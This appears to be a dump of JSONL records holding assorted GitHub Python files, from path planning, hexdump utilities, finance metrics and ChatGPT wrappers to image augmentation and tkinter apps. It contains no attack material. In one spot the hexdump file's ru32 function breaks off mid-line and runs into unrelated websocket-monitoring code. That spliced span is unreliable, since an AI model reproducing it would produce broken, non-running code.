3, 0.5, 5, 6)\n# #g.addEdge(3, 1, 1, 3, 5)\n# g.addEdge(3, 4, 3, 1, 5, 8)\n# g.addEdge(0, 4, 10, 8, 5, 0)\n# g.M={'0': (10,2,3,4,5),'1': (2,10,6,5,4),'2': (1,4,10,6,4),'3': (2,2,4,10,3),'4': (1,3,3,5,10)}\n# g.Obstacle=random.sample(range(1,GraphSize-1),NumberofObstacle)\n#g.RobotPathPlanning(0,4)\ntest_rho=np.zeros(5)\ntest=np.array([[1.234, 2.345, 4.543],[0.34, 12.545, -4.543]])\ntest=np.zeros((5,5))\ntest[2]=[1.234, 2.345, 4.543,0,0]\ntest[3]=[0.34, 12.545, -4.543,0,0]\n# test=2\n# print(g.M[str(test)][v2])\n#test SINR mapping\n","repo_name":"steakforlife/DP_simulation","sub_path":"RobotPathPlanning.py","file_name":"RobotPathPlanning.py","file_ext":"py","file_size_in_byte":6784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40423422620","text":"import struct\n\nVERBOSE = False\n\ndef set_verbose(v):\n global VERBOSE\n VERBOSE = v\n\ndef hexdump_iter(data, address=0):\n for i in range(0, len(data), 16):\n row = data[i:i+16]\n hex_dump = ' '.join('%.2x' % i for i in row).ljust(3*16-1)\n char_dump = ''.join(chr(i) if 0x20 <= i <= 0x7e else '.' 
for i in row).ljust(16)\n yield '%.8x: %s %s' % (i + address, hex_dump, char_dump)\n\ndef hexdump(data, address=0):\n for line in hexdump_iter(data, address):\n print(line)\n\ndef ru32(fp):\n pos = fp.tell()\n data = fp.read(4)\n if VERBOSE:\n hexdump(data, pos)\n return struct.unpack('= jobs_queue.max_size:\n hold_off_user = True\n\n msg = {\n \"jobs_in_queue\": queue_size,\n 'max_queue_size': jobs_queue.max_size,\n 'hold_off_user': hold_off_user,\n }\n await websocket.send_json(msg)\n await asyncio.sleep(QUEUE_STATE_WS_REFRESH_SECONDS)\n except ConnectionClosed:\n pass\n except asyncio.CancelledError:\n await websocket.close()\n","repo_name":"golemfactory/gpu-on-golem-poc","sub_path":"api/routers/monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"17710485627","text":"import os\nimport logging\nfrom pathlib import Path\nimport pandas as pd\n\nfrom rampwf.utils import blend_submissions\n\nfrom ..model import SubmissionSimilarity\n\nfrom ._query import select_event_by_name\nfrom ._query import select_submissions_by_state\nfrom ._query import select_submission_by_id\n\nlogger = logging.getLogger(\"RAMP-DATABASE\")\n\n\ndef compute_historical_contributivity(session, event_name):\n \"\"\"Compute historical contributivities of an event using\n contributivities from blending and credits.\n\n Parameters\n ----------\n session : :class:`sqlalchemy.orm.Session`\n The session to directly perform the operation on the database.\n event_name : str\n The event associated to the submission.\n \"\"\"\n submissions = select_submissions_by_state(session, event_name, state=\"scored\")\n submissions.sort(key=lambda x: x.submission_timestamp, reverse=True)\n for s in submissions:\n s.historical_contributivity = 0.0\n for s in submissions:\n s.historical_contributivity += s.contributivity\n similarities = (\n session.query(SubmissionSimilarity)\n .filter_by(type=\"target_credit\", target_submission=s)\n .all()\n )\n if similarities:\n # if a target team enters several credits to a source submission\n # we only take the latest\n similarities.sort(key=lambda x: x.timestamp, reverse=True)\n processed_submissions = []\n historical_contributivity = s.historical_contributivity\n for ss in similarities:\n source_submission = ss.source_submission\n if source_submission not in processed_submissions:\n partial_credit = historical_contributivity * ss.similarity\n source_submission.historical_contributivity += partial_credit\n s.historical_contributivity -= partial_credit\n processed_submissions.append(source_submission)\n session.commit()\n\n\ndef compute_contributivity(\n session,\n event_name,\n ramp_kit_dir,\n ramp_data_dir,\n ramp_predictions_dir=None,\n min_improvement=0.0,\n):\n \"\"\"Blend submissions of an event, compute combined score and\n contributivities.\n\n Parameters\n ----------\n session : :class:`sqlalchemy.orm.Session`\n The session to directly perform the operation on the database.\n event_name : str\n The event associated to the submission.\n ramp_kit_dir : str\n The directory of the RAMP kit.\n ramp_data_dir : str\n The directory of the data.\n ramp_predictions_dir : str\n The directory with predictions\n min_improvement : float, default is 0.0\n The minimum improvement under which greedy blender is stopped.\n \"\"\"\n logging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n logger.info(\"Combining models\")\n\n event = select_event_by_name(session, 
event_name)\n ramp_submission_dir = event.path_ramp_submissions\n score_type = event.get_official_score_type(session)\n\n submissions = select_submissions_by_state(session, event_name, state=\"scored\")\n if len(submissions) == 0:\n logger.info(\"No submissions to blend.\")\n return\n # ramp-board submission folder layout is different to that of\n # ramp-worklow. Here we symlink\n # submissions/submissions_/training_output\n # to predictions/sumbmission_/ if it exists, in order to avoid\n # rescoring the model.\n for sub in submissions:\n if ramp_predictions_dir is None or not Path(ramp_predictions_dir).exists():\n continue\n training_output_dir_board = Path(ramp_predictions_dir) / sub.basename\n training_output_dir_ramwf = (\n Path(ramp_submission_dir) / sub.basename / \"training_output\"\n )\n\n if (\n not training_output_dir_ramwf.exists()\n and training_output_dir_board.exists()\n ):\n # Note: on Windows 10+ this requires to enable the Developer Mode\n os.symlink(training_output_dir_board.resolve(), training_output_dir_ramwf)\n\n blend_submissions(\n submissions=[sub.basename for sub in submissions],\n ramp_kit_dir=ramp_kit_dir,\n ramp_data_dir=ramp_data_dir,\n ramp_submission_dir=ramp_submission_dir,\n save_output=True,\n min_improvement=min_improvement,\n )\n\n bsc_f_name = \"bagged_scores_combined.csv\"\n bsc_df = pd.read_csv(\n os.path.join(ramp_submission_dir, \"training_output\", bsc_f_name)\n )\n n_folds = len(bsc_df) // 2\n\n row = (bsc_df[\"step\"] == \"valid\") & (bsc_df[\"n_bag\"] == n_folds - 1)\n event.combined_combined_valid_score = bsc_df[row][score_type.name].values[0]\n row = (bsc_df[\"step\"] == \"test\") & (bsc_df[\"n_bag\"] == n_folds - 1)\n event.combined_combined_test_score = bsc_df[row][score_type.name].values[0]\n\n bsfb_f_name = \"bagged_scores_foldwise_best.csv\"\n bsfb_df = pd.read_csv(\n os.path.join(ramp_submission_dir, \"training_output\", bsfb_f_name)\n )\n row = (bsfb_df[\"step\"] == \"valid\") & (bsfb_df[\"n_bag\"] == n_folds - 1)\n event.combined_foldwise_valid_score = bsfb_df[row][score_type.name].values[0]\n row = (bsfb_df[\"step\"] == \"test\") & (bsfb_df[\"n_bag\"] == n_folds - 1)\n event.combined_foldwise_test_score = bsfb_df[row][score_type.name].values[0]\n\n c_f_name = \"contributivities.csv\"\n contributivities_df = pd.read_csv(\n os.path.join(ramp_submission_dir, \"training_output\", c_f_name)\n )\n\n logger.info(contributivities_df)\n for index, row in contributivities_df.iterrows():\n sub_id = int(row[\"submission\"][-9:])\n submission = select_submission_by_id(session, sub_id)\n submission.contributivity = 0.0\n for fold_i in range(n_folds):\n c_i = row[\"fold_{}\".format(fold_i)]\n submission.contributivity += c_i\n\n session.commit()\n","repo_name":"paris-saclay-cds/ramp-board","sub_path":"ramp-database/ramp_database/tools/contributivity.py","file_name":"contributivity.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"73521993812","text":"import sys\n\nn, m, s, d = map(int, sys.stdin.readline().split())\nslots = list(enumerate(map(int, sys.stdin.readline().split())))\nslots.sort(key=lambda x: -x[1])\nrefill = {}\nwhile n > 0:\n i, c = slots.pop()\n refill[i] = min(d - c, n)\n n -= refill[i]\nremaining = sum(c for i, c in slots)\nif remaining < m:\n print('impossible')\nelse:\n print(' '.join(str(refill.get(i, 0)) for i in 
range(s)))\n","repo_name":"kscharlund/kattis","sub_path":"keepitcool/keepitcool.py","file_name":"keepitcool.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34786384910","text":"import appdaemon.plugins.hass.hassapi as hass\n\n\n# Adjusts the ecobee thermostat according to state\n\nclass Climate(hass.Hass):\n\n def initialize(self):\n self.disabled_modes = [\n item.casefold() for item in self.args['disabled_modes']\n ]\n if 'windows_entity' in self.args:\n self.windows_entity = self.args['windows_entity']\n else:\n self.windows_entity = None\n\n self.climate_entity = self.args['climate_entity']\n\n # react to all windows closing\n if self.windows_entity is not None:\n self.listen_state(self.windows_closed, self.windows_entity, new='off')\n\n # react to a window opening\n if self.windows_entity is not None:\n self.listen_state(self.window_open, self.windows_entity, new='on')\n\n @property\n def allowed_mode(self):\n\n # is the automation mode in an allowed state?\n if 'away' in self.disabled_modes:\n if self.home_occupancy == 'off':\n self.log(\n 'automation declined for occupancy - ' +\n self.current_state\n )\n return False\n if 'guest' in self.disabled_modes:\n if self.guest_mode == 'on':\n self.log(\n 'automation declined for guest mode - ' +\n self.current_state\n )\n return False\n if 'quiet' in self.disabled_modes:\n if self.quiet_mode == 'on':\n self.log(\n 'automation declined for quiet mode - ' +\n self.current_state\n )\n return False\n\n return True\n\n @property\n def current_state(self):\n\n return (\n 'current_state('\n 'home_occupancy=%s, '\n 'guest_mode=%s, '\n 'moonlight=%s, '\n 'night_mode=%s, '\n 'quiet_mode=%s, '\n 'windows_state=%s'\n ')'\n %\n (\n self.home_occupancy,\n self.guest_mode,\n self.moonlight,\n self.night_mode,\n self.quiet_mode,\n self.windows_state\n )\n )\n\n @property\n def home_occupancy(self):\n return self.get_state('input_boolean.home_occupancy')\n\n @property\n def guest_mode(self):\n return self.get_state('input_boolean.guest_mode')\n\n @property\n def moonlight(self):\n return self.get_state('input_boolean.moonlight')\n\n @property\n def night_mode(self):\n return self.get_state('input_boolean.night_mode')\n\n @property\n def quiet_mode(self):\n return self.get_state('input_boolean.quiet_mode')\n\n @property\n def windows_state(self):\n return self.get_state(self.windows_entity)\n\n def windows_closed(self, entity, attribute, old, new, kwargs):\n\n # all the windows have closed - turn the climate control on\n self.call_service(\n 'climate/set_operation_mode',\n entity_id='climate.home',\n operation_mode='auto'\n )\n self.log(\n 'all windows are closed, climate control set to auto - ' +\n self.current_state\n )\n\n def window_open(self, entity, attribute, old, new, kwargs):\n\n # a window is open - turn the climate control off\n self.call_service(\n 'climate/set_operation_mode',\n entity_id='climate.home',\n operation_mode='off'\n )\n self.log(\n 'a windows is open - climate control turned off - ' +\n self.current_state\n )","repo_name":"aenea/appdaemon-config","sub_path":"climate.py","file_name":"climate.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1936772170","text":"from os import sep, write\nfrom konlpy.tag import Okt\nfrom collections import Counter\nfrom PIL import Image\nfrom wordcloud import WordCloud\nimport numpy as 
np\nimport json\nok_twitter = Okt()\n\ndef createWordCloud(json_file, fileName):\n    text = \"\"\n    words_cnt = 0\n    for writer, dic in json_file.items():\n        words = dic[\"morph\"]\n        if len(words) > 0:\n            count = np.array(list(Counter(words).items()))\n            count_value = np.array(count[:, 1], dtype=np.int32)\n            word_cnt = len(count_value[count_value > 1])\n            print(word_cnt, end=\" \")\n            words_cnt += word_cnt\n            if word_cnt > 0:\n                for word in words:\n                    text += word + \" \"\n    print(words_cnt, text)\n    # generate the word cloud\n    mask_image = np.array(Image.open(path + 'data/mask.png'))\n    wc = WordCloud(\n        font_path='C:/Windows/Fonts/NanumGothic.ttf', # font to use\n        background_color='white', # background color\n        max_words=250, # number of words to display, by highest frequency\n        mask=mask_image, # mask image\n        max_font_size=100, # maximum font size\n        colormap='hsv' # color style, e.g. 'Accent', 'Accent_r', 'Blues', 'Blues_r', etc.\n    ).generate(text)\n    wc.to_file(path + fileName + '.png')\n\npath = \"./물금고등학교-익명의-숲_생활편/\"\n\nwith open(path + \"morphs_before.json\", \"r\", encoding='UTF-8') as j:\n    json_file = json.load(j)\n\ncreateWordCloud(json_file, \"before\")\n\nwith open(path + \"morphs_after.json\", \"r\", encoding='UTF-8') as j:\n    json_file = json.load(j)\n    \ncreateWordCloud(json_file, \"after\")","repo_name":"heoshin/exhibition","sub_path":"old_code/2_6. WordCloud.py","file_name":"2_6. WordCloud.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32141759974","text":"#! /usr/bin/python3\n# -*- coding: utf-8 -*-\n'''\n@Time : 2023/1/2 12:09\n@Author : Jocx-H\n@File : detailService.py\n@Desc : PyCharm\n'''\n\nimport json\nimport random\nimport traceback\n\nfrom typing import Dict\nfrom dao import infoDao\n\n\ndef __detail__(movie_id):\n    try:\n        movie_info = infoDao.getMovieDetails(movie_id)\n    except Exception as e:\n        print(repr(e))\n        traceback.print_exc()\n        raise e\n    return movie_info\n\n\ndef getMovieDetail(movie_id) -> Dict:\n    return {'result': __detail__(movie_id)}\n\n\nif __name__ == '__main__':\n    res = getMovieDetail(100)\n    print(res)","repo_name":"Jocx-H/MovieRecommoned","sub_path":"back/Service/detailService.py","file_name":"detailService.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28898429521","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 26 23:02:25 2018\n\n@author: bas\n\"\"\"\n\ndef sortino_ratio(Y = []):\n    '''\n    Sortino Ratio is a measure of how much extra return an asset generates per unit of downside volatility.\n    The extra return is normally determined by the difference between the avg return of an asset and the avg return of a risk-free asset (e.g. treasury bonds).\n    '''\n    \n    #Current Sortino Ratio calculation is based on Red Rock CME group. 
\n    \n    #Daily Return\n    Return = (Y.pct_change()).tolist() #pct_change in decimal form\n    Avg_Return = sum(Return[1:])/len(Return[1:]) #skip the leading NaN produced by pct_change\n    \n    #Risk-Free return (for assigned period)\n    #Daily = ((2.5/100 + 1)**(1/365) - 1)*100\n    \n    \n    #Downside Standard Deviation\n    N_Returns_Sqrt = [(i**2) if i < 0.0 else 0.0 for i in Return]\n    Down_Dev = (sum(N_Returns_Sqrt)/(len(N_Returns_Sqrt)))**(1/2)\n    \n    \n    #Sortino Ratio\n    Sortino_Ratio = (Avg_Return)/Down_Dev\n    \n    return Sortino_Ratio\n\n","repo_name":"stapiastocker/Trading-Algo","sub_path":"Strategy/SortinoRatio.py","file_name":"SortinoRatio.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"14591559752","text":"import time\n\nimport openai\n\nfrom config import SLEEP_SECONDS_AFTER_CALL\n\n\nclass ChatGPTWrapper:\n    \"\"\"\n    Wrapper class for ChatGPT APIs\n    \"\"\"\n\n    @staticmethod\n    def init(api_key):\n        openai.api_key = api_key\n\n    @staticmethod\n    def ask(prompt, role=None, max_tokens=None):\n        message = [{\"role\": \"user\", \"content\": prompt}]\n        if role:\n            message.append(\n                {\n                    \"role\": \"system\",\n                    \"content\": role,\n                }\n            )\n        completion = openai.ChatCompletion.create(\n            model=\"gpt-3.5-turbo\",\n            messages=message,\n            max_tokens=max_tokens,\n        )\n\n        time.sleep(SLEEP_SECONDS_AFTER_CALL) # To make OpenAI rate limiter happy\n\n        return completion[\"choices\"][0][\"message\"][\"content\"].strip()\n\n    @staticmethod\n    def ask_as_researcher(prompt, paper_content, max_tokens=None):\n        role_message = (\n            \"You will answer this question as this research paper itself. \"\n            + paper_content\n        )\n        return ChatGPTWrapper.ask(\n            prompt=prompt, role=role_message, max_tokens=max_tokens\n        )\n","repo_name":"ruogudu/PaperGPT","sub_path":"chatgpt_wrapper.py","file_name":"chatgpt_wrapper.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"67"}
+{"seq_id":"3165650113","text":"import os\r\nimport cv2\r\nimport albumentations as A\r\nimport time # Import the time module\r\n\r\ndef augment_images_in_subfolders(root_folder, num_augmentations):\r\n    # Record the start time\r\n    total_start_time = time.time()\r\n\r\n    # Define augmentation transformations\r\n    transform_flip = A.HorizontalFlip(p=1)\r\n    transform_light = A.RandomBrightnessContrast(p=1)\r\n    transform_rotate_left = A.ShiftScaleRotate(rotate_limit=20, shift_limit=0.0625, p=1)\r\n    transform_rotate_right = A.ShiftScaleRotate(rotate_limit=-20, p=1)\r\n\r\n    # Initialize a variable to store the total execution time\r\n    total_execution_time = 0.0\r\n\r\n    # Iterate through subfolders in the root folder\r\n    for subfolder in os.listdir(root_folder):\r\n        subfolder_path = os.path.join(root_folder, subfolder)\r\n\r\n        # Check if the item in the main folder is a directory\r\n        if os.path.isdir(subfolder_path):\r\n            print(f\"Augmenting images in folder: {subfolder}\")\r\n\r\n            # Record the start time for the current subfolder\r\n            start_time = time.time()\r\n\r\n            # Iterate through image files in the subfolder\r\n            for file in os.listdir(subfolder_path):\r\n                try:\r\n                    file_path = os.path.join(subfolder_path, file)\r\n                    image = cv2.imread(file_path)\r\n\r\n                    if image is None:\r\n                        raise Exception(\"Invalid Image\")\r\n\r\n                    # Apply augmentations based on the 'num' parameter\r\n                    augmented_images = []\r\n\r\n                    if num_augmentations >= 2:\r\n                        augmented_images.append(transform_flip(image=image)[\"image\"])\r\n                        
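# second base augmentation: random brightness/contrast jitter\r\n                        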
augmented_images.append(transform_light(image=image)[\"image\"])\r\n\r\n                        if num_augmentations >= 4:\r\n                            augmented_images.append(transform_rotate_left(image=image)[\"image\"])\r\n                            augmented_images.append(transform_rotate_right(image=image)[\"image\"])\r\n\r\n                    file_name, file_ext = os.path.splitext(file)\r\n\r\n                    # Save augmented images\r\n                    for idx, augmented_image in enumerate(augmented_images):\r\n                        augmented_file_name = f\"{file_name}_aug{idx + 1}{file_ext}\"\r\n                        augmented_file_path = os.path.join(subfolder_path, augmented_file_name)\r\n                        cv2.imwrite(augmented_file_path, augmented_image) # imread/imwrite both use BGR, so no colour conversion is needed\r\n\r\n                except Exception as e:\r\n                    print(f\"Error processing {file}: {e}\")\r\n                    # Handle the error or move the problematic file here if needed\r\n                    continue\r\n\r\n            # Record the end time for the current subfolder\r\n            end_time = time.time()\r\n\r\n            # Calculate the execution time for the current subfolder\r\n            execution_time = end_time - start_time\r\n\r\n            # Add the execution time of the current subfolder to the total execution time\r\n            total_execution_time += execution_time\r\n\r\n    # Record the end time for all subfolders\r\n    total_end_time = time.time()\r\n\r\n    # Calculate the total execution time for all subfolders\r\n    total_execution_time = total_end_time - total_start_time\r\n\r\n    # Print the total execution time\r\n    print(f\"Total time for processing all subfolders: {total_execution_time:.2f} seconds\")\r\n\r\n\r\n\r\n# Example usage:\r\nroot_folder = \"Dataset\" # Replace 'MainFolder' with the path to your main directory\r\nnum_augmentations = 8 # 2 adds flip/brightness only; 4 or more adds the rotations as well\r\naugment_images_in_subfolders(root_folder, num_augmentations)\r\n","repo_name":"NitinBhore/face_recognition","sub_path":"data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"42094466907","text":"import math\r\na = float(input('Введите первое число:'))\r\nb = float(input('Введите второе число:'))\r\namin = math.ceil(min(a, b)) # Ставим округление к большему на случай если пользователь введет диапазон 4.3 5.2\r\nbmax = int(max(a, b))\r\nc = list(range(amin -1, bmax + 1)) # Так как range() срезает последнее число +1, так как итератор + 1 то берем для нашего исчесление последнее число -1\r\nfor i in c:\r\n    i += 1\r\n    if i < 1: # Отсекаем числа меньше ноля.\r\n        continue\r\n    elif i > bmax: # Если превышает bmax то цикл обрывается\r\n        break\r\n    else:\r\n        print(i)\r\nelse:\r\n    print('else')\r\n","repo_name":"Pasha-lt/ITEA","sub_path":"lesson02/hw_2_2way2.py","file_name":"hw_2_2way2.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"33135169046","text":"import webbrowser\r\nfrom tkinter import *\r\n\r\n\r\nclass ContentWindow:\r\n\r\n    def __init__(self, value):\r\n\r\n        self.WIDTH = 250\r\n        self.HEIGHT = 250\r\n\r\n        self.value = value\r\n\r\n        self.master = Tk()\r\n        self.master.title('Brief')\r\n        self.master.lift()\r\n        self.master.attributes('-topmost', True)\r\n        self.master.geometry('1008x600+230+130')\r\n        self.master.resizable(0, 0)\r\n\r\n        # The button to view the original article\r\n        Button(self.master, text='Click Here', font='corbel 10', relief=FLAT, command=self.original_article)\\\r\n            .place(x=900, y=575)\r\n        Label(self.master, text='To view full article ', font='corbel 10', relief=FLAT).place(x=750, y=575)\r\n\r\n        # A frame to hold the text 
box that contains the\r\n # description about the news\r\n\r\n self.description_frame = LabelFrame(self.master, text='Description', width=1006, height=575 - self.HEIGHT,\r\n bg='light green', font='corbel 12 bold')\r\n self.description_frame.place(x=0, y=0)\r\n\r\n # the text box in description\r\n self.desc_text_box = Text(self.description_frame, width=123, height=11, relief=SUNKEN, bd=2, wrap=WORD, font='corbel 12')\r\n self.desc_text_box.place(x=3, y=3)\r\n\r\n # The content frame to display the main news content\r\n self.content_frame = LabelFrame(self.master, text='Content', width=1006, height=575 - self.HEIGHT,\r\n bg='light blue', font='corbel 12 bold')\r\n self.content_frame.place(x=0, y=self.HEIGHT)\r\n\r\n # The text box in content_frame\r\n self.cont_text_box = Text(self.content_frame, width=123, height=15, relief=SUNKEN, bd=2, wrap=WORD, font='corbel 12')\r\n self.cont_text_box.place(x=3, y=3)\r\n\r\n # function call\r\n self.fill_info()\r\n self.master.mainloop()\r\n\r\n def fill_info(self):\r\n\r\n # Fill the description box\r\n self.desc_text_box.delete(0.0, END)\r\n self.desc_text_box.insert(0.0, self.value[1])\r\n\r\n # fill the content box\r\n # Have to beautify\r\n self.cont_text_box.delete(0.0, END)\r\n self.cont_text_box.insert(0.0, self.value[2])\r\n\r\n def original_article(self):\r\n self.master.withdraw()\r\n self.master.quit()\r\n self.master.destroy()\r\n url = self.value[3]\r\n webbrowser.open(url)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n a = ('Apple puts restrictions on coronavirus-themed apps in its App Store', 'Apple is closely evaluating apps with coronavirus focus. It says only “recognized entities such as government organizations, health-focused NGOs, companies deeply credentialed in health issues, and medical or educational institutions,” should submit such apps…', 'The company says coronavirus-themed games will not be allowed\\r\\nIllustration by Alex Castro / The Verge\\r\\nIn an effort to ensure the credibility of health and safety information in its App Store, Apple is tightening requirements for all coronavirus-focused apps… [+1028 chars]', 'https://www.theverge.com/2020/3/14/21179993/apple-restrictions-coronavirus-app-store', 'https://cdn.vox-cdn.com/thumbor/OrCEcxQRSQP5T2C0miJ8ruYHs0E=/0x146:2040x1214/fit-in/1200x630/cdn.vox-cdn.com/uploads/chorus_asset/file/11477049/acastro_180604_1777_apple_wwdc_0002.jpg')\r\n\r\n test = ContentWindow(a)","repo_name":"Adwaith-Rajesh/NEWS","sub_path":"windows/content_window.py","file_name":"content_window.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"20516336004","text":"from floodsystem.geo import stations_by_distance\nfrom floodsystem.stationdata import build_station_list\n\n# Task 1B\ndef task1B():\n lst = stations_by_distance(build_station_list(),(52.2053,0.1218))\n station = build_station_list()\n lst_closest = []\n lst_furthest = []\n\n closest = lst[:10]\n furthest = lst[-10:]\n\n for i in closest:\n lst_closest.append((i[0].name, i[0].town, i[1]))\n for j in furthest:\n lst_furthest.append((j[0].name, j[0].town, j[1]))\n\n print(f\"\\nTask1B:\\nClosest 10 stations: {lst_closest}\")\n print(f\"Furthest 10 stations: {lst_furthest}\")\n\ntask1B()\n\n","repo_name":"Matthew-Dixon/IA-Computing-Flood-system","sub_path":"Task1B.py","file_name":"Task1B.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"43700361942","text":"import gymnasium as gym\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import linalg\nfrom get_dynamics import get_k\nfrom controller import apply_state_controller\n\nenv = gym.make('CartPole-v1', render_mode='human')\nobs = env.reset()\n\nm_cart = env.masscart\nm_bob = env.masspole\ngravity = env.gravity\nl = env.length\n\nK = get_k(m_cart, m_bob, gravity, l)\n\nK_new = np.array(K[0])\n\nobs = np.array(obs[0])\n\nfor i in range(1000):\n    env.render()\n\n    action, force = apply_state_controller(K, obs)\n\n    abs_force = abs(float(np.clip(force, -10, 10)))\n\n    env.env.force_mag = abs_force\n\n    obs, reward, done, truncated, info = env.step(action)\n    if done:\n        print(f'Terminated after {i + 1} iterations.')\n        break\n\nenv.close()\n","repo_name":"gupta-anmol99/LQR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"36580644693","text":"import urllib\nimport urllib.request\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageOps\n\n\nclass TextDraw(ImageDraw.ImageDraw):\n    def align_text(self, text, x0, y0, x1, y1, font_path, ha='centre', va='centre', **kwargs):\n        draw_args = (\n            'font', 'spacing', 'direction', 'features', \n            'language', 'stroke_width'\n        )\n        draw_dict = dict()\n        for d in draw_args:\n            if d in kwargs.keys():\n                draw_dict[d] = kwargs[d]\n        \n        size = self.maximise_text_size(\n            text=text, max_w=x1-x0, max_h=y1-y0, font=font_path\n        )\n        font = ImageFont.truetype(font=font_path, size=size)\n        \n        w, h = self.textsize(text, font=font, **draw_dict)\n        \n        if ha == 'left':\n            x = x0\n        elif ha == 'right':\n            x = x1 - w\n        elif ha == 'centre':\n            x = (x0 + x1 - w) / 2\n        else:\n            print(ha, 'OH NO')\n        \n        if va == 'top':\n            y = y0\n        elif va == 'bottom':\n            y = y1 - h\n        elif va == 'centre':\n            y = (y0 + y1 - h) / 2\n        else:\n            print(va, 'OH NO')\n        \n        self.text(xy=(x, y), text=text, font=font, **kwargs)\n        \n        # DEBUG - draw rectangle used by text\n        # self.rectangle(xy=[x, y, x+w, y+h])\n        \n    def maximise_text_size(self, text, max_w, max_h, **kwargs):\n        def fits(size):\n            local_dict = {k: v for k, v in kwargs.items()}\n            font = ImageFont.truetype(local_dict.pop('font'), size=size)\n            w, h = self.textsize(text, font=font, **local_dict)\n            \n            return w <= max_w and h <= max_h\n        \n        upper = max_h\n        while fits(upper):\n            upper *= 2\n        \n        lower = int(upper / 2)\n        while not fits(lower):\n            lower = int(lower / 2)\n        \n        while (upper - lower) > 1:\n            mid = int((upper + lower) / 2)\n            if fits(mid):\n                lower = mid\n            else:\n                upper = mid\n        \n        return lower\n    \n    \ndef scale_from_url(url, x0, y0, x1, y1, blur_size=3):\n    w = x1 - x0\n    h = y1 - y0\n\n    img = Image.open(urllib.request.urlopen(url)).convert('RGBA')\n    \n    if blur_size:\n        img = ImageOps.expand(img, border=blur_size*10, fill=(0,0,0,0))\n        blur = img.filter(ImageFilter.GaussianBlur(radius=blur_size))\n        blur.paste(img, mask=img)\n        img = blur\n    \n    img = img.crop(img.getbbox())\n    \n    img_w, img_h = img.size\n\n    if img_w >= img_h:\n        new_w = w\n        new_h = int(img_h * new_w / img_w)\n    else:\n        new_h = h\n        new_w = int(img_w * new_h / img_h)\n\n    scaled = img.resize((new_w, new_h), resample=Image.ANTIALIAS)\n\n    new_x0 = x0 + int((w-new_w)/2)\n    new_y0 = y0 +int((h-new_h)/2)\n\n    return scaled, new_x0, 
new_y0\n","repo_name":"asongtoruin/fixture_bot","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75024367911","text":"from Box_Dialog import *\nfrom Box_Input import *\nfrom Cbox_Prompt import *\nfrom Menu_mode import *\nfrom Cbox_Model import *\nfrom Button_Load import *\nfrom scripts.add_chat import *\nfrom scripts.check_format import *\nfrom scripts.is_prompt_changed import *\nfrom ask_GPT import *\n# 提交用户输入设置的参数\ndef submit_user_parameter():\n # 将用户输入的文本提交到对话框\n user_content = Input_box.get(\"1.0\", \"end\")\n Input_box.delete(\"1.0\", \"end\")\n Dialog_box.config(state=tk.NORMAL)\n Dialog_box.insert(tk.END, \"\\nUser:\\n\" + user_content + \"\\n\")\n Dialog_box.config(state=tk.DISABLED)\n Dialog_box.see(tk.END)\n Dialog_box.update()\n # 获取用户输入的参数\n try:\n temperature = float(temperature_box.get())\n except:\n # 如果用户没有输入温度,就默认为0.6\n temperature = 0.6\n try:\n max_token = int(max_tokens_box.get())\n except:\n # 如果用户没有输入最大标记数,就默认为50\n max_token = 50\n return user_content, temperature, max_token, \\\n selected_model.get(), selected_prompt_title.get(),selected_mode.get()\n\n# 检查格式并发送\ndef check_and_sendGPT(text, temperature, max_token, selected_model, selected_prompt,\n selected_mode\n ):\n # 检查对话记录格式\n chat_history_format, history = check_format(chat_history)\n # 检查对话记录与模型是否匹配\n if model_in_mode[selected_model] == chat_history_format:\n #功能模式\n if selected_mode == mode_dict[0]:\n # 检查期间是否更改了功能\n if is_prompt_changed(chat_history, chat_history_format, prompts[selected_prompt]):\n add_chat(prompts[selected_prompt], chat_history, chat_history_format, \"system\")\n\n # 添加用户输入\n if chat_history_format == format_list[0]:\n add_chat(text, chat_history, model_in_mode[selected_model], \"user\")\n elif chat_history_format == format_list[1]:\n add_chat(GPT3_add_prompt + text, chat_history, model_in_mode[selected_model], \"user\")\n #导入模式\n elif selected_mode == mode_dict[1]:\n if chat_history_format == format_list[0]:\n 